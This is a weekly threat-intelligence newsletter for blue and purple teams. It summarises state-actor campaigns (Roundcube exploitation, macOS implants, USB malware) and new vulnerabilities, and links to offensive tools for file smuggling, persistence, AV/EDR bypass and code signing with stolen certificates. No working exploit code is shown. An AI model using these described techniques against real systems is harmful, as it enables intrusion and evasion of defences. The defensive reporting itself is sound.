

Discover more from Cyber Defence Analysis for Blue & Purple Teams
Welcome to the weekly highlights and analysis of the blueteamsec subreddit (and my wider reading). Not everything makes it in, but the best bits do.
Operationally this week the usual constant contact of chaos but not anything overly standout other than Microsoft’s revelation of the DDoS attacks Azure experienced and the resulting impact in early June. That and fact there continues to be more MOVEit vulnerabilities - an exemplar of vuln surging in action..
In the high-level this week:
UK to give Ukraine major boost to mount counteroffensive - Up to £25 million expansion to harden Ukraine’s cyber defences as Russia continues its callous attacks
Justice Department Announces New National Security Cyber Section Within the National Security Division - This new section will allow NSD to increase the scale and speed of disruption campaigns and prosecutions of nation-state threat actors, state-sponsored cybercriminals, associated money launderers, and other cyber-enabled threats to national security
Russia-aligned hackers pose threat to Canada energy sector - spy agency - "We assess there is an even chance of a disruptive incident in the oil and gas sector in Canada caused by Russia-aligned actors, due to their higher tolerance for risk, the increase in their numbers and activity, as well as the number of vulnerable targets in the sector overall,
Peters Introduces Bipartisan Bill to Strengthen American Cybersecurity Partnerships with International Partners and Allies to Prevent Attacks - The bill would allow the Department of Homeland Security (DHS) to quickly provide support to foreign partners, such as Ukraine, that continue to face increasing cybersecurity threats. The legislation would also ensure that the Cybersecurity and Infrastructure Security Agency (CISA) can work with international allies to strengthen our nation’s defenses and protect critical foreign networks like financial markets and oil pipelines that are essential to the global economy.
Khashoggi’s widow sues Israeli firm over spyware she says ruined her life - In the lawsuit, Hanan Elatr says Saudi Arabia used NSO’s Pegasus spyware to track her and her husband’s whereabouts before he was murdered
Global protection against cybercrime now within reach - The chair of the process, HE Faouzia Mebarki, is about to publish a draft of the convention for discussion, based on agreements reached by UN member states and outlining proposed compromises on the remaining contentious issues.
Who’s Afraid of the SEC? - The SEC wants to require fast, public disclosure of cybersecurity incidents. These rules could benefit investors—and the cyber ecosystem.
Log4J Lesson Learned from the Financial Services Cross Market Operational Resilience Group - Log4j was another warning sign of the growing complexity and dynamic nature of the security landscape, particularly with software components that are an ever-increasing part of our complex digital world.
China tightens controls on cross-border data transfers - On June 1, the Measures on the Standard Contract for the Cross-Border Transfer of Personal Information came into effect, requiring certain personal data processors, including companies handling data on fewer than 1 million people, to sign contracts with overseas recipients before sending data abroad.
Russia will spend 4.8 billion on a special "Internet for the authorities" - the UK had a model similar to this with the Public Services Network, which we deprecated.
Shadayev said that state-owned companies are required to switch to basic Russian software by January 1, 2025 - state-owned companies should switch to the use of Russian operating systems, office software, DBMS and virtualization systems, Maksut Shadayev, head of the Ministry of Digital Development, said on Saturday during SPIEF-2023 - the balkanization of technologies at pace.
Hackers hacked into the management of the equipment of the Selyatino agricultural hub in the Moscow region - tried to spoil 40,000 tons of frozen products
related from the US Food Producers Band Together in Face of Cyber Threats - Companies launch information-sharing platform for industry as attacks mount
Privacy-enhancing technologies (PETs) from the UK’s Information Commissioners Office - we have created new PETs guidance, which is aimed at data protection officers and others who are using large personal data sets in finance, healthcare, research, and central and local government
Artificial Intelligence - An Accountability Framework for Federal Agencies and Other Entities - from the US’s Government Accountability Office
Courts
Progress Software (makes of MOVEit) sued in class action lawsuit - Software liability for cyber security trundles down the runway..
Massachusetts Man Sentenced for Computer Intrusion - industral espionage via SIM swapping
U.K. Citizen Extradited and Pleads Guilty to Cyber Crime Offenses - O’Connor used his sophisticated technological abilities for malicious purposes – conducting a complex SIM swap attack to steal large amounts of cryptocurrency, hacking Twitter, conducting computer intrusions to take over social media accounts, and even cyberstalking two victims, including a minor victim
Intelligent Generation of Tools for Security (INGOTS) - a very interesting DARPA program - The INGOTS program will develop novel approaches, driven by program analysis and Artificial Intelligence (AI), to measure vulnerabilities within modern, complex systems
Recommendation of the Council on the Governance of Digital Identity from the OECD
Shifting paradigms in platform regulation - Moreover, the more exorbitant the assertion of jurisdiction, the greater the headache of enforcement. Which in turn leads to what we see in the UK Online Safety Bill, namely provisions for disrupting the activities of the non-compliant foreign platform: injunctions against support services such as banking or advertising, and site blocking orders against ISPs.
Analysis exploring risks and opportunities linked to the use of collaborative industrial robots in Europe - The necessary security in human-robot collaboration limits the development of collaborative robots and prevents them from achieving the benefits of traditional industrial robots. It is therefore necessary to advance in key aspects such as detection of humans and increased security.
No reflections this week as I have been in a lot meetings so not had much time ponder outside of those.
On the interesting job/role front (thanks to those sending me these):
Crime Prevention and Criminal Justice Officer - Programme Officer (Cybercrime Legal and Policy) at the United Nations
Deputy Director of Cyber, Technology and Security at the Australian Strategic Policy Institute
Assistant Director, Cyber Statecraft Initiative at the Atlantic Council
Chief Information Security Officer (CISO) at the United Nations World Food Programme in Rome Italy - I have been advised they will pay relocation to Rome
Enjoying this? don’t get via e-mail? Subscribe:
Think someone else would benefit? Share:
Have a lovely Friday
Ollie
Cyber threat intelligence
Who is doing what to whom and how.
Russia
APT28 group used three Roundcube exploits (CVE-2020-35730, CVE-2021-44026, CVE-2020-12641) during another espionage campaign
Two bits of reporting on this exploitation by Russia. The elegance of the intelligence collection operation by redirecting the victims email through vulnerability exploitation can’t be understated.
during the investigation of the contents of the mailbox of the computer user, an e-mail with the subject "News of Ukraine" was discovered, received on 12.05.2023 from the address "ukraine_news@meta[.]ua", which contained bait content in the form of an article from the publication "NV" (nv.ua), as well as an exploit for the vulnerability in Roundcube CVE-2020-35730 (XSS) and the corresponding JavaScript code designed to load and run additional JavaScript files: "q.js" and "e.js".
https://cert.gov.ua/article/4905829
BlueDelta Exploits Ukrainian Government Roundcube Mail Servers to Support Espionage Activities
Vendor reporting on the same which the Ukraine government acknowledged,
We identified BlueDelta activity highly likely targeting a regional Ukrainian prosecutor's office and a central Ukrainian executive authority, as well as reconnaissance activity involving additional Ukrainian government entities and an organization involved in Ukrainian military aircraft infrastructure upgrade and refurbishment.
the analyzed BlueDelta phishing campaign exploits the vulnerabilities CVE-2020-35730, CVE-2020-12641, and CVE-2021-44026 in the open-source webmail software Roundcube in order to run multiple reconnaissance and exfiltration scripts.
The malicious scripts are designed to redirect a victim’s future incoming emails to an actor-controlled email address, perform reconnaissance on the target Roundcube server, exfiltrate the victim’s Roundcube session cookie and address book, along with session and user information from Roundcube’s database
https://go.recordedfuture.com/hubfs/reports/cta-2023-0620.pdf
Cyber attack by group UAC-0057 (GhostWriter) against the state organization of Ukraine using PicassoLoader and Cobalt Strike Beacon
Russia shows that they continue to use rather basic techniques in the hope of hitting gold.
[We] discovered the PPT document "daewdfq342r.ppt", which contains a macro and a thumbnail image with the emblem of the National Defense University of Ukraine named after Ivan Chernyakhivskyi.
If the document is opened and the macro is activated, an executable file "%APPDATA%\Signal_update_6.0.3.4\glkgh90kjykjkl650kj0.dll" will be created on the victim's computer, as well as a shortcut file designed to run the latter.
https://cert.gov.ua/article/4905718
Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine
Russian threat actor who uses phishing as their initial infection vector.
In some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.
In a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions, such as USB propagation malware.
North Korea
Lots of tactical reporting omitted this week as again there was so much. Can be found on the subreddit.
APT37 attack targeting macOS users in South Korea
North Korean continue to show their macOS capability muscle.
macOS-based spear phishing attack targeting South Koreans
The 6th Responsibility to Protect (R2P) Attempt to access by disguising as materials of international conference
Disguise HWP Korean document icon for Apple’s macOS to induce APP viewing
Use of command and control (C2) servers disguised as Samsung Galaxy Note domains
Malicious AppleScript2 installation of OSA (Open Scripting Architecture) standard
Registering the LaunchAgents option for persistence
Using the same C2-like information stealing technique behind the APT37 attack
Shortcut (LNK) malicious file creation tool used by attacker first discovered
https://www.genians.co.kr/blog/threat_intelligence_report_macos
https://www.genians.co.kr/hubfs/blogfile/20230620_threat_inteligence_report_apt37_macos.pdf
Lazarus fake recruiter campaign implant
North Korean legacy campaign subject to detailed South Korean reporting. Their social engineering tradecraft and persistence continues to impress and make up for their lack of technical capabilities.
Since June of last year, the North Korean hacking group Lazarus has been using PuTTY, KiTTY, TightVNC, and Sumatra PDF.
Modifying open source software such as Reader, muPDF/Subliminal Recording, and malware
Disguise yourself as a recruiter for a specific company on LinkedIn and ask engineers and spread malicious code. Modified open-source software can perform malicious actions just by running it.
It does not, and the user browses a specific PDF or connects to a specific server with a modified Putty.
It uses an attack method in which a malicious action starts only when a specific event occurs.
https://download.hauri.net/DownSource/down/dwn_detail_down.html?uid=51
mac OS implant
Two bits of reporting on the same capability here.
Jokerspy
Colson Wilhoit, Salim Bitam, Seth Goodwin, Andrew Pease and Ricardo Ungureanu provide a hint as to the initial infection sector.
REF9134 leverages custom and open source tools for reconnaissance and command and control
Targets of this activity include a cryptocurrency exchange in Japan
The xcc binary was executed via bash by three separate processes
/Applications/IntelliJ IDEA.app/Contents/MacOS/idea
/Applications/iTerm.app/Contents/MacOS/iTerm2
/Applications/Visual Studio Code.app/Contents/MacOS/Electron.
While we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or 3rd party dependency that provided the threat actor access.
https://www.elastic.co/security-labs/inital-research-of-jokerspy
Fragments of Cross-Platform Backdoor Hint at Larger Mac OS Attack
Andrei LAPUSNEANU and Bogdan BOTEZATU report on the same and the vapors around it on VirusTotal.
our Mac researchers stumbled upon a small set of files with backdoor capabilities that seem to form part of a more complex malware toolkit. The following analysis is incomplete, as we are trying to identify the puzzle pieces that are still missing.
As of now, these samples are still largely undetected and very little information is available about any of them.
https://bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/
China
Beyond the Horizon: Traveling the World on Camaro Dragon’s USB Flash Drives
Chinese threat actor and the horror story of why USB continues to be a source of anxiety for a lot of organizations.
Patient Zero in the malware infection was identified as an employee who had participated in a conference in Asia. He shared his presentation with fellow attendees using his USB drive. Unfortunately, one of his colleagues had an infected computer, so his own USB drive unknowingly became infected as a result. Upon returning to his home hospital in Europe, the employee introduced the infected USB drive to the hospital’s computer systems, which led the infection to spread.
The malware gained access to the healthcare institution systems through an infected USB drive. During the investigation, the Check Point Research (CPR) team discovered newer versions of the malware with similar capabilities to self-propagate through USB drives. In this way, malware infections originating in Southeast Asia spread uncontrollably to different networks around the globe, even if those networks are not the threat actors’ primary targets.
The main payload variant, called WispRider, has undergone significant revisions. In addition to backdoor capabilities and the ability to propagate through USB using the HopperTick launcher, the payload includes additional features, such as a bypass for SmadAV, an anti-virus solution popular in Southeast Asia. The malware also performs DLL-side-loading using components of security software, such as G-DATA Total Security, and of two major gaming companies (Electronic Arts and Riot Games). Check Point Research responsibly notified these companies on the above-mentioned use of their software by the attackers.
The prevalence and nature of the attacks using self-propagating USB malware demonstrate the need of protecting against those, even for organizations that may not be the direct targets of such campaigns. We found evidence of USB malware infections at least in the following countries: Myanmar, South Korea, Great Britain, India and Russia.
Graphican: Flea Uses New Backdoor in Attacks Targeting Foreign Ministries
Another Chinese implant in this reporting. E-mail appears to be the initial access vector.
This campaign was primarily focused on foreign affairs ministries in the Americas, although the group also targeted a government finance department in a country in the Americas and a corporation that sells products in Central and South America. There was also one victim based in a European country, which was something of an outlier.
Flea used a large number of tools in this campaign. As well as the new Graphican backdoor, the attackers leveraged a variety of living-off-the-land tools, as well as tools that have been previously linked to Flea. We will detail these tools in this section.
Behind the Scenes: Unveiling the Hidden Workings of Earth Preta
Sunny Lu, Vickie Su and Nick Dai provide further detail into the modus operandi of this Chinese threat actor. A lot of social engineering and e-mail as the initial access vector.
In 2023, we observed Earth Preta using several new arrival vectors, including MIROGO, QMAGENT, and the new TONESHELL dropper called TONEDROP. Likewise, the infection chains of these arrival vectors have also changed. For example, in addition to deploying legitimate Google Drive download links, the actors also used other download sites that resembled but were not actually Google Drive pages.
Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor, Suspected Links to China
Austin Larsen, John Palmisano, Mathew Potaczek, John Wolfram and Matthew Mcwhirt detail the Chinese exploitation of this zero day. The capability of China and their willingness to use is continues to alarm. However we must take confidence also in our ability to detect and respond.
Between May 22, 2023 and May 24, 2023, UNC4841 countered with high frequency operations targeting a number of victims located in at least 16 different countries. Overall, Mandiant identified that this campaign has impacted organizations across the public and private sectors worldwide, with almost a third being government agencies.
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
Uncovering a New Activity Group Targeting Governments in the Middle East and Africa
Lior Rochberger details a likely Chinese threat actor whose initial access vector is exploiting web services running on IIS to deploy web shells. The product placement in this post is very high, so hold on.
During an investigation of one of the instances, we observed a series of failed attempts to execute the infamous China Chopper webshell. In the following days after the failed attempts, we observed a new suspicious activity originating from the Exchange Server’s w3wp.exe process, which upon investigation appeared to be resulting from an in-memory VBscript implant deployed by the threat actor.
DoNot APT Elevates its Tactics by Deploying Malicious Android Apps on Google Play Store
Suspected Indian state threat actor who ups their game and aggression with no more side loading for their Android implants. I suspect they use social engineering to entice the user to install from Google Play.
The apps were stationed under an account named “SecurITY Industry” on Google Play Store. A total of three Android apps were hosted with the name Device Basic Plus, nSure Chat, and iKHfaa VPN, with two of them having malicious characteristics, that are nSure Chat and iKHfaa VPN. The threat actor used cleaned and innocent Android Libraries and made them fetch contacts and the location of the compromised victim. iKHfaa VPN copied its code from a genuine VPN service provider and injected additional libraries to silently perform malicious activity.
Fake Security Researcher GitHub Repositories Deliver Malicious Implant
Jacob Baines details a campaign against the very fabric of security society. The persistence of the threat is of note. This has whiffs of the North Korean campaign a couple of years ago.
In early May, [we] came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.
Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.
Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.
Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.
https://vulncheck.com/blog/fake-repos-deliver-malicious-implant
Discovery
How we find and understand the latent compromises within our environments.
New Techniques: Uncovering Tor Hidden Service with Etag
Japanese researcher releases a technique which operationally secure aware threat actors will now adapt to avoid.
The de-anonymization method using Etag is almost unknown to the public, and I believe that it is a valuable contribution to the community.
https://sh1ttykids.medium.com/new-techniques-uncovering-tor-hidden-service-with-etag-5249044a0e9d
Automating acquisition for incident response
Nikolas Mantas brings a massive capability uplift to Azure cyber incident response. You can see many Managed Service Providers adopting this.
In this blog we discuss the significance of automation during the incident response process and introduce a (downloadable!) playbook for Microsoft Azure that leverages Logic Apps to streamline the collection of evidence upon incident notification, based on a predefined criticality of your systems.
https://falconforce.nl/falconfriday-automating-acquisition-for-incident-response-0xff23/
Defence
How we proactively defend our environments.
Guide to Mitigate BlackLotus Threat
US Government (NSA) provide advice on how to mitigate this root of trust underminer.
BlackLotus exploits a known vulnerability called “Baton Drop,” CVE-2022-21894, which bypasses security features during the device’s startup process, also known as Secure Boot. The malware targets Secure Boot by exploiting vulnerable boot loaders not added into the Secure Boot Deny List Database (DBX).
win32-app-isolation: Tools and documentation for Win32 app isolation
Microsoft release a means to further constrain arbitrary applications on Windows to provide further defense in depth.
Win32 app isolation is a new security feature on Windows that helps contain the damage and safeguard user privacy choices in the event of an application compromise. Win32 app isolation is built on the foundation of AppContainers, which offer a security boundary, and components that virtualize resources and provide brokered access to other resources. This repo contains the documentation and tools to help you isolate your applications.
https://github.com/microsoft/win32-app-isolation
Vulnerability
Our attack surface.
GitHub Dataset Reveals Millions Potentially Vulnerable to RepoJacking
Ilay Goldman and Yakir Kadkoda highlight a vulnerability class which is going to be extensive. It will be interesting to see if GitHub respond as a service level to this or not.
There are some restrictions about the capability of the attacker of opening the old repository name (the restrictions are called retired names). However, they are applied only on popular repositories that were popular before the rename, and recently researchers found many bypasses to these restrictions allowing attackers to open any repository they want.
CVE-2023-1183 | LibreOffice - Arbitrary File Write in hsqldb 1.8.0
Not sure who uses LibreOffice in anger, but this is a pretty special vulnerability due to the nested nature and the fact it stems from the underlying technology.
LibreOffice supports embedded databases in its odb file format. The most common format is hsqldb. LibreOffice typically contains a copy of hsqldb version 1.8.0 to load this format. Each odb file contains a "database/script" file which hsqldb parses to setup the database. Hsqldb supports a "SCRIPT" keyword which is normally used to record the commands input by the database admin to output such a script. In affected versions of LibreOffice, an attacker could craft an odb containing a "database/script" file which itself contained a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.
https://www.libreoffice.org/about-us/security/advisories/cve-2023-1183/
Freaky Leaky SMS: Extracting User Locations by Analyzing SMS Timings
Evangelos Bitsikas, Theodor Schnitzler, Christina Pöpper and Aanjhan Ranganathan show that data science is going to enable the discovery of numerous side channels that would have otherwise been thought of as impossible.
Our results show that, after training an ML model, the SMS sender can accurately determine multiple locations of the recipient. For example, our model achieves up to 96% accuracy for locations across different countries, and 86% for two locations within Belgium. Due to the way cellular networks are designed, it is difficult to prevent Delivery Reports from being returned to the originator making it challenging to thwart this covert attack without making fundamental changes to the network architecture.
https://arxiv.org/abs/2306.07695
Video-Based Cryptanalysis
Ben Nassi, Etay Iluz, Ofek Vayner, Or Cohen, Dudi Nassi, Boris Zadov and Yuval Elovici bring Hollywood to life with this research. It will be interesting to see how and if this capability bleeds into the NSO like companies. The mitigation is electrical tape over your LEDs obviously.
Exploiting a Video Camera's Rolling Shutter to Recover Secret Keys from Devices Using Video of Their Power LED - demonstrate the application of video-based cryptanalysis by performing two side-channel cryptanalytic timing attacks and recover: (1) a 256- bit ECDSA key
https://www.nassiben.com/video-based-crypta
Vulnerability in WooCommerce Stripe Gateway Plugin - used by 900,000 sites
GDPR called and wants it vulnerability back.
This plugin suffers from an Unauthenticated Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows any unauthenticated user to view any WooCommnerce order’s PII data including email, user’s name, and full address.
WordPress: 1+ Million Sites Affected by Critical Privilege Escalation Vulnerability in Essential Addons for Elementor Plugin
The 90s called and want its vulnerability back.
This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site.
Offense
Attack capability, techniques and trade-craft.
Evasive File Smuggling with Skyhook
Justin Angel releases a work aid which will co-opted by various malicious actors one suspects rather quickly. I also suspect data science will help with detection its use.
Skyhook was developed to cut the manual nonsense out of applying obfuscation to bypass network-based controls. An HTTP(S) file server is used to seamlessly read plaintext files from disk and serve them to clients in obfuscated chunks. Each chunk passes through a series of pipelined algorithms called obfuscators that alter the content in transit. In addition to the file content, file listings, and names are passed through the same chain to prevent leakage.
https://www.blackhillsinfosec.com/evasive-file-smuggling-with-skyhook/
hermes-the-messenger: A PoC for achieving persistence via push notifications on Windows
Nikos Laleas details how to use Windows Push Notifications as a persistence mechanism. 🏅 to the first person to produce a Velociraptor artifact.
Essentially, we register the app to handle incoming notifications, even when it's not running, and we request a channel Uri for the AAD app created previously.
https://www.persistent-security.net/post/beacon-on-demand-abusing-push-notifications-for-persistence
https://github.com/persistent-security/hermes-the-messenger
Exploitation
What is being exploited.
openfire鉴权绕过漏洞原理解析 - Openfire Authentication Bypass Vulnerability Principle Analysis
Chinese analysis of this vulnerability which is actively being exploited in the wild.
An authentication bypass vulnerability exists in Openfire that allows an unauthenticated user in a configured Openfire environment using an unauthenticated Openfire Setup environment to access restricted pages in the Openfire Admin Console reserved for administrative users.
IoT Under Siege: The Anatomy of the Latest Mirai Campaign Leveraging Multiple IoT Exploits
Over 20 vulnerabilities in a range of products from CCTV DVR to routers.
https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/
Tooling and Techniques
Low level tooling and techniques for attack and defence researchers…
MagicSigner: Signtool for expired certificates
Got access to a stolen, unrevoked code signing certificate? Then this is what you need.
Patcher DLL for signtool that allows signing with expired certificates
https://github.com/namazso/MagicSigner
Footnotes
Some other small (and not so small) bits and bobs which might be of interest.
Aggregate reporting
BypassAV: This map lists the essential techniques to bypass anti-virus and EDR
Threat activity and vulnerabilities in Indonesia, Malaysia, Philippines, and Thailand
The Experience of Cybercrime in Georgia: Awareness, Victimisation and Reporting
Artificial Intelligence and Data Protection in Latin America
The Secret Sauce behind 100K context window in LLMs: all tricks in one place
Tracing Ransomware Threat Actors Through Stylometric Analysis and Chat Log Examination
This newsletter is produced by BinaryFirefly, it is via BinaryFirefly I support a hand picked set of organisations across investment, strategy and capability in the domain of cyber.
For sponsorship enquiries regarding Bluepurple or anything else contact hello@binaryfirefly.com.